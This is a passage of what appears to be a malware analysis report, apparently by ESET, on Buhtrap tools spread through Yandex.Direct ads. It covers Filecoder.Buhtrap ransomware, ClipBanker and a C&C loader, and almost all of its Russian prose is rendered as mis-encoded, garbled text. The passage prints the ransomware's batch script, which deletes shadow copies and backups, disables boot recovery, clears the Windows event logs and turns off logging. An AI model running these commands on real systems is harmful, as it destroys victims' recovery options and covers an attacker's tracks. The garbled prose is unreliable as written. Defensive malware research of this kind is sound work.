ΠΊΠ»ΡŽΡ‡Π΅ΠΉ ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ. ВмСсто этого ΠΎΠ½ добавляСт Β«Ρ‚ΠΎΠΊΠ΅Π½Β» Π² ΠΊΠΎΠ½Ρ†Π΅ сообщСния ΠΎ Π²Ρ‹ΠΊΡƒΠΏΠ΅, Π° для связи с ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Π°ΠΌΠΈ ΠΏΡ€Π΅Π΄Π»Π°Π³Π°Π΅Ρ‚ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒemail ΠΈΠ»ΠΈ Bitmessage.

Π§Ρ‚ΠΎΠ±Ρ‹ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΊΠ°ΠΊ ΠΌΠΎΠΆΠ½ΠΎ большС Π²Π°ΠΆΠ½Ρ‹Ρ… рСсурсов, Filecoder.Buhtrap запускаСт ΠΏΠΎΡ‚ΠΎΠΊ, ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Π½Ρ‹ΠΉ для Π·Π°Π²Π΅Ρ€ΡˆΠ΅Π½ΠΈΡ Ρ€Π°Π±ΠΎΡ‚Ρ‹ ΠΊΠ»ΡŽΡ‡Π΅Π²ΠΎΠ³ΠΎ ПО, Ρƒ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΈ Ρ„Π°ΠΉΠ»ΠΎΠ² с Ρ†Π΅Π½Π½ΠΎΠΉ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠ΅ΠΉ, Ρ‡Ρ‚ΠΎ ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΠΎΠΌΠ΅ΡˆΠ°Ρ‚ΡŒ ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡŽ. Π¦Π΅Π»Π΅Π²Ρ‹Π΅ процСссы – Π² основном, систСмы управлСния Π±Π°Π·ΠΎΠΉ Π΄Π°Π½Π½Ρ‹Ρ… (Π‘Π£Π‘Π”). ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, Filecoder.Buhtrap удаляСт Ρ„Π°ΠΉΠ»Ρ‹ ΠΆΡƒΡ€Π½Π°Π»ΠΎΠ² ΠΈ бэкапы, Ρ‡Ρ‚ΠΎΠ±Ρ‹ Π·Π°Ρ‚Ρ€ΡƒΠ΄Π½ΠΈΡ‚ΡŒ восстановлСниС Π΄Π°Π½Π½Ρ‹Ρ…. Для этого исполняСтся ΠΏΠ°ΠΊΠ΅Ρ‚Π½Ρ‹ΠΉ скрипт, ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½Π½Ρ‹ΠΉ Π½ΠΈΠΆΠ΅.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½Ρ‹ΠΉ ΠΎΠ½Π»Π°ΠΉΠ½-сСрвис IP Logger, созданный для сбора ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΎ посСтитСлях сайтов. Π­Ρ‚ΠΎ ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½ΠΎ для отслСТивания ΠΆΠ΅Ρ€Ρ‚Π² ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€Π°, Π·Π° Ρ‡Ρ‚ΠΎ ΠΎΡ‚Π²Π΅Ρ‡Π°Π΅Ρ‚ командная строка:

mshta.exe "javascript:document.write('');"

Π€Π°ΠΉΠ»Ρ‹ для ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ Π²Ρ‹Π±ΠΈΡ€Π°ΡŽΡ‚ΡΡ Π² случаС нСсовпадСния ΠΏΠΎ Ρ‚Ρ€Π΅ΠΌ спискам ΠΈΡΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠΉ. Π’ΠΎ-ΠΏΠ΅Ρ€Π²Ρ‹Ρ…, Π½Π΅ ΡˆΠΈΡ„Ρ€ΡƒΡŽΡ‚ΡΡ Ρ„Π°ΠΉΠ»Ρ‹ со ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌΠΈ Ρ€Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΡΠΌΠΈ: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ΠΈ .bat. Π’ΠΎ-Π²Ρ‚ΠΎΡ€Ρ‹Ρ…, всС Ρ„Π°ΠΉΠ»Ρ‹, для ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… ΠΏΠΎΠ»Π½Ρ‹ΠΉ ΠΏΡƒΡ‚ΡŒ содСрТит строки Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ ΠΈΠ· списка, ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½Π½ΠΎΠ³ΠΎ Π½ΠΈΠΆΠ΅, ΠΈΡΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‚ΡΡ.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

Π’-Ρ‚Ρ€Π΅Ρ‚ΡŒΠΈΡ…, ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹Π΅ ΠΈΠΌΠ΅Π½Π° Ρ„Π°ΠΉΠ»ΠΎΠ² Ρ‚Π°ΠΊΠΆΠ΅ ΠΈΡΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‚ΡΡ ΠΈΠ· ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ, срСди Π½ΠΈΡ… имя Ρ„Π°ΠΉΠ»Π° сообщСния с Ρ‚Ρ€Π΅Π±ΠΎΠ²Π°Π½ΠΈΠ΅ΠΌ Π²Ρ‹ΠΊΡƒΠΏΠ°. Бписок прСдставлСн Π½ΠΈΠΆΠ΅. ΠžΡ‡Π΅Π²ΠΈΠ΄Π½ΠΎ, всС эти ΠΈΡΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΡ ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Ρ‹ для сохранСния возмоТности запуска ΠΌΠ°ΡˆΠΈΠ½Ρ‹, Π½ΠΎ с Π΅Π΅ минимальной ΠΏΡ€ΠΈΠ³ΠΎΠ΄Π½ΠΎΡΡ‚ΡŒΡŽ ΠΊ эксплуатации.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

Π‘Ρ…Π΅ΠΌΠ° ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ Ρ„Π°ΠΉΠ»ΠΎΠ²

ПослС запуска врСдоносноС ПО Π³Π΅Π½Π΅Ρ€ΠΈΡ€ΡƒΠ΅Ρ‚ ΠΏΠ°Ρ€Ρƒ 512-Π±ΠΈΡ‚Π½Ρ‹Ρ… ΠΊΠ»ΡŽΡ‡Π΅ΠΉ RSA. ΠŸΡ€ΠΈΠ²Π°Ρ‚Π½Π°Ρ экспонСнта (d) ΠΈ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ (n) Π·Π°Ρ‚Π΅ΠΌ ΡˆΠΈΡ„Ρ€ΡƒΡŽΡ‚ΡΡ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ТСстко Π·Π°ΠΊΠΎΠ΄ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ 2048-Π±ΠΈΡ‚Π½ΠΎΠ³ΠΎ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΎΠ³ΠΎ ΠΊΠ»ΡŽΡ‡Π° (открытая экспонСнта ΠΈ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ), ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‹Π²Π°ΡŽΡ‚ΡΡ zlib ΠΈ ΠΊΠΎΠ΄ΠΈΡ€ΡƒΡŽΡ‚ΡΡ Π² base64. ΠžΡ‚Π²Π΅Ρ‡Π°ΡŽΡ‰ΠΈΠΉ Π·Π° это ΠΊΠΎΠ΄ ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½ Π½Π° рисункС 2.

Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚
Рисунок 2. Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ дСкомпиляции Hex-Rays процСсса Π³Π΅Π½Π΅Ρ€Π°Ρ†ΠΈΠΈ 512-Π±ΠΈΡ‚Π½ΠΎΠΉ ΠΏΠ°Ρ€Ρ‹ ΠΊΠ»ΡŽΡ‡Π΅ΠΉ RSA.

НиТС ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ простого тСкста со сгСнСрированным Π·Π°ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΌ ΠΊΠ»ΡŽΡ‡ΠΎΠΌ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ прСдставляСт собой прикрСпляСмый ΠΊ ΡΠΎΠΎΠ±Ρ‰Π΅Π½ΠΈΡŽ ΠΎ Π²Ρ‹ΠΊΡƒΠΏΠ΅ Ρ‚ΠΎΠΊΠ΅Π½.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

ΠžΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΉ ΠΊΠ»ΡŽΡ‡ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΡ… ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½ Π½ΠΈΠΆΠ΅.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

Π€Π°ΠΉΠ»Ρ‹ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Ρ‹ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ AES-128-CBC с 256-Π±ΠΈΡ‚Π½Ρ‹ΠΌ ΠΊΠ»ΡŽΡ‡ΠΎΠΌ. Для ΠΊΠ°ΠΆΠ΄ΠΎΠ³ΠΎ ΡˆΠΈΡ„Ρ€ΡƒΠ΅ΠΌΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π° Π³Π΅Π½Π΅Ρ€ΠΈΡ€ΡƒΡŽΡ‚ΡΡ Π½ΠΎΠ²Ρ‹ΠΉ ΠΊΠ»ΡŽΡ‡ ΠΈ Π½ΠΎΠ²Ρ‹ΠΉ Π²Π΅ΠΊΡ‚ΠΎΡ€ ΠΈΠ½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ. Π˜Π½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡ ΠΎ ΠΊΠ»ΡŽΡ‡Π΅ добавляСтся Π² ΠΊΠΎΠ½Π΅Ρ† ΡˆΠΈΡ„Ρ€ΡƒΠ΅ΠΌΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π°. Рассмотрим Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π°.
Π£ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… Ρ„Π°ΠΉΠ»ΠΎΠ² ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΉ header:

Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚

Π”Π°Π½Π½Ρ‹Π΅ исходного Ρ„Π°ΠΉΠ»Π° с Π΄ΠΎΠ±Π°Π²Π»Π΅Π½ΠΈΠ΅ΠΌ магичСского значСния VEGA ΡˆΠΈΡ„Ρ€ΡƒΡŽΡ‚ΡΡ Π΄ΠΎ ΠΏΠ΅Ρ€Π²Ρ‹Ρ… 0Ρ…5000 Π±Π°ΠΉΡ‚ΠΎΠ². Вся информация для Ρ€Π°ΡΡˆΠΈΡ„Ρ€ΠΎΠ²ΠΊΠΈ прикрСпляСтся ΠΊ Ρ„Π°ΠΉΠ»Ρƒ со ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅ΠΉ структурой:

Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚

β€” ΠœΠ°Ρ€ΠΊΠ΅Ρ€ Ρ€Π°Π·ΠΌΠ΅Ρ€Π° Ρ„Π°ΠΉΠ»Π° содСрТит ΠΌΠ΅Ρ‚ΠΊΡƒ, ΡƒΠΊΠ°Π·Ρ‹Π²Π°ΡŽΡ‰ΡƒΡŽ, ΠΏΡ€Π΅Π²Ρ‹ΡˆΠ°Π΅Ρ‚ Π»ΠΈ Ρ„Π°ΠΉΠ» Ρ€Π°Π·ΠΌΠ΅Ρ€ Π² 0x5000 Π±Π°ΠΉΡ‚
β€” AES key blob = ZlibCompress(RSAEncrypt(AES ΠΊΠ»ΡŽΡ‡ + IV, ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΉ ΠΊΠ»ΡŽΡ‡ сгСнСрированной ΠΏΠ°Ρ€Ρ‹ ΠΊΠ»ΡŽΡ‡Π΅ΠΉ RSA))
β€” RSA key blob = ZlibCompress(RSAEncrypt(сгСнСрированный Π·Π°ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΉ ΠΊΠ»ΡŽΡ‡ RSA, ТСстко Π·Π°ΠΊΠΎΠ΄ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΉ ΠΊΠ»ΡŽΡ‡ RSA))

Win32/ClipBanker

Win32/ClipBanker – ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ с ΠΏΠ΅Ρ€Π΅Ρ€Ρ‹Π²Π°ΠΌΠΈ распространялся с ΠΊΠΎΠ½Ρ†Π° октября Π΄ΠΎ Π½Π°Ρ‡Π°Π»Π° дСкабря 2018 Π³ΠΎΠ΄Π°. Π•Π³ΠΎ Ρ€ΠΎΠ»ΡŒ Π·Π°ΠΊΠ»ΡŽΡ‡Π°Π΅Ρ‚ΡΡ Π² отслСТивании содСрТимого Π±ΡƒΡ„Π΅Ρ€Π° ΠΎΠ±ΠΌΠ΅Π½Π°, ΠΎΠ½ ΠΈΡ‰Π΅Ρ‚ адрСса ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ²Π°Π»ΡŽΡ‚Π½Ρ‹Ρ… кошСльков. ΠžΠΏΡ€Π΅Π΄Π΅Π»ΠΈΠ² адрСс Ρ†Π΅Π»Π΅Π²ΠΎΠ³ΠΎ кошСлька, ClipBanker замСняСт Π΅Π³ΠΎ Π½Π° адрСс, ΠΏΡ€Π΅Π΄ΠΏΠΎΠ»ΠΎΠΆΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ‰ΠΈΠΉ ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Π°ΠΌ. ΠžΠ±Ρ€Π°Π·Ρ†Ρ‹, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΌΡ‹ ΠΈΠ·ΡƒΡ‡ΠΈΠ»ΠΈ, Π½Π΅ Π±Ρ‹Π»ΠΈ Π½ΠΈ ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Ρ‹, Π½ΠΈ обфусцированы. ЕдинствСнный ΠΌΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌ, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡ‹ΠΉ для маскировки повСдСния, – ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅ строк. АдрСса кошСльков ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€ΠΎΠ² Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Ρ‹ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ RC4. Π¦Π΅Π»Π΅Π²Ρ‹Π΅ ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ²Π°Π»ΡŽΡ‚Ρ‹ – Bitcoin, Bitcoin cash, Dogecoin, Ethereum ΠΈ Ripple.

Π’ ΠΏΠ΅Ρ€ΠΈΠΎΠ΄ распространСния врСдоносной ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ Π½Π° Bitcoin-кошСльки Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΡ… Π±Ρ‹Π»Π° ΠΎΡ‚ΠΏΡ€Π°Π²Π»Π΅Π½Π° Π½Π΅Π·Π½Π°Ρ‡ΠΈΡ‚Π΅Π»ΡŒΠ½Π°Ρ сумма Π² Π’Π’Π‘, Ρ‡Ρ‚ΠΎ ставит ΠΏΠΎΠ΄ сомнСниС успСх ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, Π½Π΅Ρ‚ оснований ΠΏΡ€Π΅Π΄ΠΏΠΎΠ»Π°Π³Π°Ρ‚ΡŒ, Ρ‡Ρ‚ΠΎ эти Ρ‚Ρ€Π°Π½Π·Π°ΠΊΡ†ΠΈΠΈ Π²ΠΎΠΎΠ±Ρ‰Π΅ Π±Ρ‹Π»ΠΈ связаны с ClipBanker.

Win32/RTM

ΠšΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚ Win32/RTM распространялся Π² Ρ‚Π΅Ρ‡Π΅Π½ΠΈΠ΅ Π½Π΅ΡΠΊΠΎΠ»ΡŒΠΊΠΈΡ… Π΄Π½Π΅ΠΉ Π² Π½Π°Ρ‡Π°Π»Π΅ ΠΌΠ°Ρ€Ρ‚Π° 2019 Π³ΠΎΠ΄Π°. RTM – троян-Π±Π°Π½ΠΊΠ΅Ρ€, написанный Π½Π° Delphi, Π½Π°Ρ†Π΅Π»Π΅Π½Π½Ρ‹ΠΉ Π½Π° систСмы дистанционного банковского обслуТивания. Π’ 2017 Π³ΠΎΠ΄Ρƒ исслСдоватСли ESET ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π»ΠΈ ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½Ρ‹ΠΉ Π°Π½Π°Π»ΠΈΠ· этой ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹, описаниС всС Π΅Ρ‰Π΅ Π°ΠΊΡ‚ΡƒΠ°Π»ΡŒΠ½ΠΎ. Π’ январС 2019 Π³ΠΎΠ΄Π° Palo Alto Networks Ρ‚Π°ΠΊΠΆΠ΅ выпустили пост Π² Π±Π»ΠΎΠ³Π΅ ΠΎ RTM.

Π—Π°Π³Ρ€ΡƒΠ·Ρ‡ΠΈΠΊ Buhtrap

НСкотороС врСмя Π½Π° GitHub Π±Ρ‹Π» доступСн Π·Π°Π³Ρ€ΡƒΠ·Ρ‡ΠΈΠΊ, Π½Π΅ ΠΏΠΎΡ…ΠΎΠΆΠΈΠΉ Π½Π° ΠΏΡ€Π΅Π΄Ρ‹Π΄ΡƒΡ‰ΠΈΠ΅ инструмСнты Buhtrap. Он обращаСтся ΠΊ https://94.100.18[.]67/RSS.php?<some_id> для получСния ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅Π³ΠΎ этапа ΠΈ Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ Π΅Π³ΠΎ Π½Π°ΠΏΡ€ΡΠΌΡƒΡŽ Π² ΠΏΠ°ΠΌΡΡ‚ΡŒ. МоТно Π²Ρ‹Π΄Π΅Π»ΠΈΡ‚ΡŒ Π΄Π²Π° повСдСния ΠΊΠΎΠ΄Π° Π²Ρ‚ΠΎΡ€ΠΎΠ³ΠΎ этапа. Π’ ΠΏΠ΅Ρ€Π²ΠΎΠΌ URL RSS.php ΠΏΠ΅Ρ€Π΅Π΄Π°Π²Π°Π» бэкдор Buhtrap Π½Π°ΠΏΡ€ΡΠΌΡƒΡŽ – этот бэкдор ΠΎΡ‡Π΅Π½ΡŒ ΠΏΠΎΡ…ΠΎΠΆ Π½Π° Ρ‚ΠΎΡ‚, Ρ‡Ρ‚ΠΎ доступСн послС ΡƒΡ‚Π΅Ρ‡ΠΊΠΈ исходного ΠΊΠΎΠ΄Π°.

Π§Ρ‚ΠΎ интСрСсно, ΠΌΡ‹ Π²ΠΈΠ΄ΠΈΠΌ нСсколько ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΉ с бэкдором Buhtrap, ΠΈ ΠΏΡ€Π΅Π΄ΠΏΠΎΠ»ΠΎΠΆΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ ΠΈΡ… Π²Π΅Π΄ΡƒΡ‚ Ρ€Π°Π·Π½Ρ‹Π΅ ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Ρ‹. Π’ Π΄Π°Π½Π½ΠΎΠΌ случаС Π³Π»Π°Π²Π½ΠΎΠ΅ Ρ€Π°Π·Π»ΠΈΡ‡ΠΈΠ΅ Π² Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎ бэкдор загруТаСтся Π½Π°ΠΏΡ€ΡΠΌΡƒΡŽ Π² ΠΏΠ°ΠΌΡΡ‚ΡŒ ΠΈ Π½Π΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ ΠΎΠ±Ρ‹Ρ‡Π½ΡƒΡŽ схСму с процСссом развСртывания DLL, ΠΎ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ ΠΌΡ‹ рассказывали Ρ€Π°Π½ΡŒΡˆΠ΅. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Ρ‹ ΠΈΠ·ΠΌΠ΅Π½ΠΈΠ»ΠΈ ΠΊΠ»ΡŽΡ‡ RC4, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡ‹ΠΉ для ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ сСтСвого Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ° ΠΊ C&C-сСрвСру. Π’ Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²Π΅ ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΉ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΌΡ‹ Π²ΠΈΠ΄Π΅Π»ΠΈ, ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Ρ‹ Π½Π΅ Π·Π°Π±ΠΎΡ‚ΠΈΠ»ΠΈΡΡŒ ΠΎ смСнС этого ΠΊΠ»ΡŽΡ‡Π°.

Π’Ρ‚ΠΎΡ€ΠΎΠ΅, Π±ΠΎΠ»Π΅Π΅ слоТноС ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ – URL RSS.php ΠΏΠ΅Ρ€Π΅Π΄Π°Π²Π°Π» Π΄Ρ€ΡƒΠ³ΠΎΠΉ Π·Π°Π³Ρ€ΡƒΠ·Ρ‡ΠΈΠΊ. Π’ Π½Π΅ΠΌ Π±Ρ‹Π»Π° Ρ€Π΅Π°Π»ΠΈΠ·ΠΎΠ²Π°Π½Π° нСкая обфускация, такая ΠΊΠ°ΠΊ пСрСстроСниС динамичСской Ρ‚Π°Π±Π»ΠΈΡ†Ρ‹ ΠΈΠΌΠΏΠΎΡ€Ρ‚Π°. ЦСль Π·Π°Π³Ρ€ΡƒΠ·Ρ‡ΠΈΠΊΠ° – ΡΠ²ΡΠ·Π°Ρ‚ΡŒΡΡ с C&C-сСрвСром msiofficeupd[.]com/api/F27F84EDA4D13B15/2, ΠΎΡ‚ΠΏΡ€Π°Π²ΠΈΡ‚ΡŒ Π»ΠΎΠ³ΠΈ ΠΈ ΠΆΠ΄Π°Ρ‚ΡŒ ΠΎΡ‚Π²Π΅Ρ‚Π°. Он ΠΎΠ±Ρ€Π°Π±Π°Ρ‚Ρ‹Π²Π°Π΅Ρ‚ ΠΎΡ‚Π²Π΅Ρ‚ ΠΊΠ°ΠΊ blob, Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ Π΅Π³ΠΎ Π² ΠΏΠ°ΠΌΡΡ‚ΡŒ ΠΈ выполняСт. ПолСзная Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠ°, ΠΊΠΎΡ‚ΠΎΡ€ΡƒΡŽ ΠΌΡ‹ Π²ΠΈΠ΄Π΅Π»ΠΈ ΠΏΡ€ΠΈ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠΈ этого Π·Π°Π³Ρ€ΡƒΠ·Ρ‡ΠΈΠΊΠ°, Π±Ρ‹Π»Π° Ρ‚Π΅ΠΌ ΠΆΠ΅ бэкдором Buhtrap, Π½ΠΎ, Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ, ΡΡƒΡ‰Π΅ΡΡ‚Π²ΡƒΡŽΡ‚ ΠΈ Π΄Ρ€ΡƒΠ³ΠΈΠ΅ ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Ρ‹.

Android/Spy.Banker

